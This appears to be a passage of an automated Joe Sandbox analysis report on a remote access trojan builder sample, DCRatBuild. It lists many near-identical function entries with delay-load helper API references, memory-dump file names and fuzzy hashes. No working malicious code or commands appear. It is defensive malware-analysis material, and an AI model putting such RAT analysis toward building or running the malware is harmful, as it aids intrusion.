Instruction ID: ce88bd913ec7dd2bd3e25ad0da7995000672f6daff07714d84c8fbfd2bff8292
Opcode Fuzzy Hash: 0c58b65c7f8d0404303682f9bbf01a7288bc9a63fa10c4ae2e444ca984694ca0
Instruction Fuzzy Hash: 33B012F126C341EC310CB20B6C02D3B028CD0C1B14330C12BF409C01C4D8448D0C4C32

Function 008EDAD9 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008EDAB2

Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c0fb82c3b3ed60751667f3b8ed7f24061ab03f3d7bdbe9b8356450e3c3ffbc70
Instruction ID: 52b4eac0cb4753ad993ccfcb695c87e714d652ab186076c119a775cba98f5b13
Opcode Fuzzy Hash: c0fb82c3b3ed60751667f3b8ed7f24061ab03f3d7bdbe9b8356450e3c3ffbc70
Instruction Fuzzy Hash: EBB012E126C341AC310CB60B6D02E3E028CE0C5B14330852BF009C01C4D8408C0D4832

Function 008EDBC3 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008EDBD5

Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 04278f547f00a0d36794675af59e8b0e07214c18116deb4e26770f97ea9a7de3
Instruction ID: 21ea5212bd82c549432efa1c34cd7ffca600631e6ff8530f827d2f8e79413200
Opcode Fuzzy Hash: 04278f547f00a0d36794675af59e8b0e07214c18116deb4e26770f97ea9a7de3
Instruction Fuzzy Hash: E7B012A537D34A7C320C52067C07D37021CE4C1B24330452AB009E00C0EE404C4D4432

Function 008EDBDE Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008EDBD5

Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 9bda9f105c56db7d4c915c49a0061ce9e285d6d96a3f2d2f620b2dd12043b7ed
Instruction ID: 5e7e9f9d7f7d96fed2ea4a3853d7d562a45d7d02b3d9b226508a9f19efbaa16b
Opcode Fuzzy Hash: 9bda9f105c56db7d4c915c49a0061ce9e285d6d96a3f2d2f620b2dd12043b7ed
Instruction Fuzzy Hash: 02B012A537C3457C310C921A6D07F36025DF4C1B24330442AB00ED01C0EE404C0D4432

Function 008EDBE8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008EDBD5

Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0f6d621a2587bd43bc479b9082d92e7b253c0d9efe5e76082155532824c094d1
Instruction ID: 883e99115923d96534966241d518b62487ce0912ec5dee464d77e194de31e2ad
Opcode Fuzzy Hash: 0f6d621a2587bd43bc479b9082d92e7b253c0d9efe5e76082155532824c094d1
Instruction Fuzzy Hash: 07B012A537D346BC310C920A6C07E3702ACE4C1B24330841AB40DD11C0EE404C0D4432

Function 008EDBFC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008EDBD5

Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c4a7ff19d6eda3e0eae4e9face0b3e0be9ab948b9633bd937b1ddde3d7793b55
Instruction ID: 4fd9e0a871a6fd83b54c7fbf48c56af3792ca8561d49e7be190357d184035bbe
Opcode Fuzzy Hash: c4a7ff19d6eda3e0eae4e9face0b3e0be9ab948b9633bd937b1ddde3d7793b55
Instruction Fuzzy Hash: 70B012A537D3867C310C920A6D07E37025CE4C1B24330841AB10DD01C0EE404C0E4432

Function 008EDB01 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008EDAB2

Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a65d815eca9012bc6c23c7884a012225f1ef9a3ddbb83211e6fcbec1f1fd8a9b
Instruction ID: fd4964cef1a39789007162438d350496fd332c914b81b0c8b30d6727c7bfcacf
Opcode Fuzzy Hash: a65d815eca9012bc6c23c7884a012225f1ef9a3ddbb83211e6fcbec1f1fd8a9b
Instruction Fuzzy Hash: BFB012E12AC345AC710CB20B6D02E3A028CF0C1B14330413BF009C01C4D9408C0C4932

Function 008EDC24 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008EDC36

Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f335ae0c926b47a353bcd9f01ac7f61769e0812c3a00f3a553479481afec9559
Instruction ID: 691bea5bfa8caab48aa7d1a6ad334c8dedb2fb95d0c52b3253073e411fbbddf9
Opcode Fuzzy Hash: f335ae0c926b47a353bcd9f01ac7f61769e0812c3a00f3a553479481afec9559
Instruction Fuzzy Hash: 33B012A526C345BC310C624ABF02C3A022CD2C1F54330461AB105E01C099C05C4C5432

Function 008EDC5D Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008EDC36

Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b66ae385346884c3c65e7b4e60740887bae53fe6fd0c044a110eb373784c6c4f
Instruction ID: 1e670f21cf7141f9b473fc83672315d1475010e01a6febe8f8e2ccff107902d2
Opcode Fuzzy Hash: b66ae385346884c3c65e7b4e60740887bae53fe6fd0c044a110eb373784c6c4f
Instruction Fuzzy Hash: 7CB012A527C341AC310CA24EAD02D3A026CE1C1F54330451BB109D02C0D9809C0C4432

Function 008EDC53 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008EDC36

Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b49e56a6fa12b7fb430f15183f888be5f8a17c0d962cacdeece13788d5fcdcd9
Instruction ID: 594ad00be487ca8e65113b58fc991c825679c8db508921158ee10ecc56035b45
Opcode Fuzzy Hash: b49e56a6fa12b7fb430f15183f888be5f8a17c0d962cacdeece13788d5fcdcd9
Instruction Fuzzy Hash: 45B012A526C341AC310CA24EAD02D3A026CD1C6F54330851AB509D02C0D9805C0C4432

Function 008ED8D9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008ED8A3

Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e325a647b944d639cf4c244ab3b970aed03057ab97959089b7ffef1fb4ae5414
Instruction ID: ed0b7d01d0ddc0ceed7a73bbfcd15236c6fe4fe507712e7edc6647fb71efc084
Opcode Fuzzy Hash: e325a647b944d639cf4c244ab3b970aed03057ab97959089b7ffef1fb4ae5414
Instruction Fuzzy Hash: 55A001E66AD697BC7108A256AD66D3A421CE8C6B69730892AB44AE41C1A9806C4D5832

Function 008ED98D Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008ED8A3

Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8bacc2c903961316ba569b38cccee6efe9814ffce20610989eefcdb92207a8ae
Instruction ID: ed0b7d01d0ddc0ceed7a73bbfcd15236c6fe4fe507712e7edc6647fb71efc084
Opcode Fuzzy Hash: 8bacc2c903961316ba569b38cccee6efe9814ffce20610989eefcdb92207a8ae
Instruction Fuzzy Hash: 55A001E66AD697BC7108A256AD66D3A421CE8C6B69730892AB44AE41C1A9806C4D5832

Function 008ED983 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008ED8A3

Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7afcf60be1db2e6244a9a8af344c8386d40d16d0a7e2dc42b80c1dbc2e32981c
Instruction ID: ed0b7d01d0ddc0ceed7a73bbfcd15236c6fe4fe507712e7edc6647fb71efc084
Opcode Fuzzy Hash: 7afcf60be1db2e6244a9a8af344c8386d40d16d0a7e2dc42b80c1dbc2e32981c
Instruction Fuzzy Hash: 55A001E66AD697BC7108A256AD66D3A421CE8C6B69730892AB44AE41C1A9806C4D5832

Function 008ED997 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008ED8A3

Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 51db815c5a2b484cc703ba86aaba315e5681b8ca453799975824514f74c76d01
Instruction ID: ed0b7d01d0ddc0ceed7a73bbfcd15236c6fe4fe507712e7edc6647fb71efc084
Opcode Fuzzy Hash: 51db815c5a2b484cc703ba86aaba315e5681b8ca453799975824514f74c76d01
Instruction Fuzzy Hash: 55A001E66AD697BC7108A256AD66D3A421CE8C6B69730892AB44AE41C1A9806C4D5832

Function 008ED91F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008ED8A3

Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6a7154c2677db024c451af3a44d46258a6a15c469cfed6f54ec2168021bdf9c1
Instruction ID: ed0b7d01d0ddc0ceed7a73bbfcd15236c6fe4fe507712e7edc6647fb71efc084
Opcode Fuzzy Hash: 6a7154c2677db024c451af3a44d46258a6a15c469cfed6f54ec2168021bdf9c1
Instruction Fuzzy Hash: 55A001E66AD697BC7108A256AD66D3A421CE8C6B69730892AB44AE41C1A9806C4D5832

Function 008ED93D Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008ED8A3

Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 82769350b79562ecda4b17028b44e489e0ea8fe4c074f6da398a2b7633faa60c
Instruction ID: ed0b7d01d0ddc0ceed7a73bbfcd15236c6fe4fe507712e7edc6647fb71efc084
Opcode Fuzzy Hash: 82769350b79562ecda4b17028b44e489e0ea8fe4c074f6da398a2b7633faa60c
Instruction Fuzzy Hash: 55A001E66AD697BC7108A256AD66D3A421CE8C6B69730892AB44AE41C1A9806C4D5832

Function 008ED95B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008ED8A3

Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b0368143de36281fba16b5a0cf7acfca81e6678134de2b34592b3074cce3ca9c
Instruction ID: ed0b7d01d0ddc0ceed7a73bbfcd15236c6fe4fe507712e7edc6647fb71efc084
Opcode Fuzzy Hash: b0368143de36281fba16b5a0cf7acfca81e6678134de2b34592b3074cce3ca9c
Instruction Fuzzy Hash: 55A001E66AD697BC7108A256AD66D3A421CE8C6B69730892AB44AE41C1A9806C4D5832

Function 008ED951 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008ED8A3

Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
